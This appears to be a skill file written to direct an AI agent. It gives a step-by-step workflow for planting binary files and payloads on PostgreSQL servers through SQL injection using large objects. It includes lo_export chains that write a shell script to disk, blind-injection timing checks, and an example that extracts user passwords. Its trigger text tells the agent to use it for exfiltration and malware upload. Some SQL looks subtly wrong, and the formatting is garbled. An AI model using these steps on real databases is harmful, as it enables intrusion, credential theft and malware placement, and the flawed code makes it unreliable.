Hacktricks-skills postgresql-large-object-upload
Upload binary files to PostgreSQL using large objects (pg_largeobject). Use this skill whenever you need to store files in PostgreSQL, exfiltrate data via SQL injection, upload malware payloads, or work with pg_largeobject, lo_creat, lo_import, lo_export functions. Trigger for any PostgreSQL file upload task, binary data storage, or when dealing with SQL injection scenarios requiring file operations.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql/SKILL.MDPostgreSQL Large Object Upload
This skill helps you upload binary files to PostgreSQL using the
pg_largeobject table, which stores data in 2KB chunks. This is essential for SQL injection exploitation, data exfiltration, and file storage in PostgreSQL databases.
When to Use This Skill
- Uploading files to PostgreSQL via SQL injection
- Storing binary data (images, PDFs, executables) in PostgreSQL
- Exfiltrating data through SQL injection vulnerabilities
- Working with
,pg_largeobject
,lo_creat
,lo_importlo_export - Creating reverse shells or payloads in PostgreSQL
Core Concepts
Large Object Structure
PostgreSQL large objects store data in the
pg_largeobject table with this structure:
- loid: Large Object ID (unique identifier)
- pageno: Page number (0-indexed, each page = 2KB)
- data: Binary data chunk (exactly 2KB except possibly the last chunk)
Why 2KB Chunks?
The
lo_export() function requires chunks to be exactly 2KB (2048 bytes) for proper reconstruction. The last chunk can be smaller.
Workflow
Step 1: Prepare Your File
Split your binary file into 2KB chunks:
# Use the bundled script python scripts/chunk_file.py <input_file> <output_dir> # Or manually split -b 2048 your_file.txt chunks_
Step 2: Encode Chunks
Encode each chunk to Base64 or Hex for SQL insertion:
# Base64 (recommended - more compact) python scripts/encode_chunks.py --format base64 chunks_* # Hex (useful for certain injection contexts) python scripts/encode_chunks.py --format hex chunks_*
Encoding size considerations:
- Base64:
bytes (e.g., 2KB → ~2.7KB)ceil(n / 3) * 4 - Hex:
bytes (e.g., 2KB → 4KB)n * 2
Step 3: Create Large Object
Choose your method based on your access level:
Method A: lo_creat
(Standard)
lo_creat-- Create a new large object (auto-generated LOID) SELECT lo_creat(-1); -- Note: Returns the LOID you'll need for subsequent operations
Method B: lo_create
(Fixed LOID - for Blind SQLi)
lo_create-- Create with specific LOID (useful for blind SQL injection) SELECT lo_create(173454);
Why fixed LOID? In blind SQL injection, you can't see the returned LOID. Using a fixed value lets you reference it in subsequent queries.
Step 4: Insert Data Chunks
Using Base64 (Recommended)
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<base64_chunk_1>', 'base64')); INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<base64_chunk_2>', 'base64')); -- Continue for all chunks...
Using Hex
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<hex_chunk_1>', 'hex')); -- Or update existing pages UPDATE pg_largeobject SET data = decode('<hex_chunk_1>', 'hex') WHERE loid = 173454 AND pageno = 0;
Step 5: Export to Filesystem
-- Export the large object to a file SELECT lo_export(173454, '/tmp/your_file'); -- Clean up (optional but recommended) SELECT lo_unlink(173454);
Alternative: lo_import
Method
lo_importIf you have filesystem access on the database server:
-- Import file directly (creates LOID automatically) SELECT lo_import('/path/to/file'); -- Import with specific LOID SELECT lo_import('/path/to/file', 173454);
Note:
lo_import requires the database user to have read access to the file path on the database server.
SQL Injection Scenarios
Blind SQL Injection
When you can't see query results:
- Use fixed LOID (e.g., 173454)
- Insert chunks one at a time
- Use time-based or boolean-based checks to verify success
- Export when all chunks are inserted
Example time-based check:
-- If this succeeds, wait 5 seconds SELECT CASE WHEN (SELECT count(*) FROM pg_largeobject WHERE loid=173454) > 0 THEN pg_sleep(5) ELSE NULL END;
Error-Based SQL Injection
Use errors to confirm operations:
-- Trigger error if LOID doesn't exist SELECT lo_export(173454, '/tmp/test');
Debugging
View Large Object Contents
-- See all chunks (escape encoding for readability) SELECT loid, pageno, encode(data, 'escape') FROM pg_largeobject WHERE loid = 173454 ORDER BY pageno; -- Count chunks SELECT loid, count(*) as chunk_count FROM pg_largeobject WHERE loid = 173454; -- Check total size SELECT loid, count(*) * 2048 as approx_size_bytes FROM pg_largeobject WHERE loid = 173454;
List All Large Objects
SELECT loid FROM pg_largeobject;
Limitations & Considerations
Access Control Lists (ACLs)
Large objects may have ACLs restricting access:
- You may not be able to access objects you didn't create
- Older objects might have permissive ACLs (useful for exfiltration)
- Check permissions:
SELECT * FROM pg_largeobject_metadata WHERE loid = <oid>
Required Privileges
/lo_creat
: Requireslo_create
privilege on the databaseCREATE
: Requireslo_export
privilege onEXECUTElo_export
: Requireslo_import
privilege onEXECUTElo_import
: Requires ownership orlo_unlink
privilegeDELETE
Size Limits
- PostgreSQL large objects can store up to 4GB per object
- Each chunk must be exactly 2KB (except the last)
- Total chunks =
ceil(file_size / 2048)
Quick Reference
| Operation | SQL Command | Notes |
|---|---|---|
| Create LO | | Auto-generates LOID |
| Create LO (fixed) | | Use for blind SQLi |
| Insert chunk | | 2KB chunks |
| Export | | Write to filesystem |
| Delete | | Clean up |
| View chunks | | Debug |
Scripts
Use the bundled scripts to automate the workflow:
- Split files into 2KB chunksscripts/chunk_file.py
- Encode chunks to Base64 or Hexscripts/encode_chunks.py
- Generate SQL INSERT statementsscripts/generate_sql.py
Run
python scripts/<script>.py --help for usage details.
Examples
Upload a Shell Script
# 1. Chunk the file python scripts/chunk_file.py /tmp/shell.sh /tmp/chunks/ # 2. Encode to Base64 python scripts/encode_chunks.py --format base64 /tmp/chunks/* # 3. Generate SQL python scripts/generate_sql.py --loid 173454 --format base64 /tmp/chunks/* # 4. Execute SQL in your injection point # 5. Export: SELECT lo_export(173454, '/tmp/shell.sh');
Exfiltrate Database Contents
-- 1. Create large object SELECT lo_create(173455); -- 2. Insert data from sensitive table INSERT INTO pg_largeobject (loid, pageno, data) SELECT 173455, 0, encode((SELECT password FROM users LIMIT 1), 'base64'); -- 3. Export SELECT lo_export(173455, '/tmp/extracted.txt');
Troubleshooting
"Large object does not exist": The LOID doesn't exist or was already deleted. Create a new one.
"Permission denied": Check your privileges on
lo_export and the target directory.
"Chunk size mismatch": Ensure all chunks except the last are exactly 2KB.
File corrupted after export: Verify chunk sizes and that all chunks were inserted in order.